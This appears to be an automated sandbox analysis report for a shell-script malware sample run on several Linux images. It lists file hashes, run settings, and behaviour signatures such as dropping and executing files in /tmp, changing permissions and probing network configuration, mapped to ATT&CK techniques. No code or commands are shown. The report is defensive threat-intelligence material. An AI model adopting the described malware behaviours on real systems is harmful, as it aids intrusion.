Analysis
- max time kernel: 20s
- max time network: 131s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 28/10/2024, 02:45
Static task: static1
Behavioral task: behavioral1
- Sample: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
- Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
- Sample: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
- Resource: debian9-mipsel-20240611-en
General
- Target: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
- Size: 10KB
- MD5: 213cb7829c8f2673d0e3a75ed6639e13
- SHA1: 3daec954fef9c3751e7ce17a5d90672ccaf98608
- SHA256: 7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17
- SHA512: b8be68bfce37af24db9820d6960f1a66a43e4822dff463d9d5a485644d38ba72c7556113c1f4884d0c87fbf4bf318833208844059dcbb8b998dc6cf8e29554c4
- SSDEEP: 192:UouKo0b2Oyw0Iz0sbES+ssW5dw/3vUfDp5dw/3jrS+sFfDzPo0b2Ov0Iz0sl:UoGw0Iz0sbES+ssW5dw/3m5dw/3nS+s/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97